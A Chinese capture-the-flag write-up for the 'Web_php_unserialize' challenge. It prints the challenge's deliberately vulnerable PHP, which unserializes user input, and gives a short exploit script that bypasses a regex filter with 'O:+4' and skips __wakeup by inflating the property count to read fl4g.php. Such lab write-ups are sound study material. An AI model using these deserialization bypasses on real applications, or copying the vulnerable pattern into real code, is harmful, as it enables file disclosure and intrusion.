攻防世界-Web-Web_php_unserialize

项目场景:

 
class Demo { 
    private $file = 'index.php';
    public function __construct($file) { 
        $this->file = $file; 
    }
    function __destruct() { 
        echo @highlight_file($this->file, true); 
    }
    function __wakeup() { 
        if ($this->file != 'index.php') { 
            //the secret is in the fl4g.php
            $this->file = 'index.php'; 
        } 
    } 
}
if (isset($_GET['var'])) { 
    $var = base64_decode($_GET['var']); 
    if (preg_match('/[oc]:\d+:/i', $var)) { 
        die('stop hacking!'); 
    } else {
        @unserialize($var); 
    } 
} else { 
    highlight_file("index.php"); 
} 
?>

问题描述

根据题目提示可以知道是关于php反序列化的问题,需要对Demo函数进行反序列化,__wakeup进行绕过,并且需要注意preg_match函数中关于/[oc]:\d+:/i的绕过,最后通过GET请求传入var为用base64转化过的payload


原因分析:

攻防世界-Web-Web_php_unserialize_第1张图片
看以看出flag在fl4g.php中,并且__destruct中告诉我们如果Demo类被销毁,那么就会高亮显示file所指向的文件的内容,接下来需要进行对preg_match函数中关于/[oc]:\d+:/i的绕过


解决方案:

exp:


class Demo {
    private $file = 'fl4g.php';
}

$payload = serialize(new Demo);
$payload = str_replace('O:4', 'O:+4', $payload);//绕过preg_match()
$payload = str_replace(':1:', ':3:', $payload);//绕过__wakeup()
echo base64_encode($payload);

运行得到反序列化结果
在这里插入图片描述

攻防世界-Web-Web_php_unserialize_第2张图片

你可能感兴趣的:(Web,安全,web安全,php)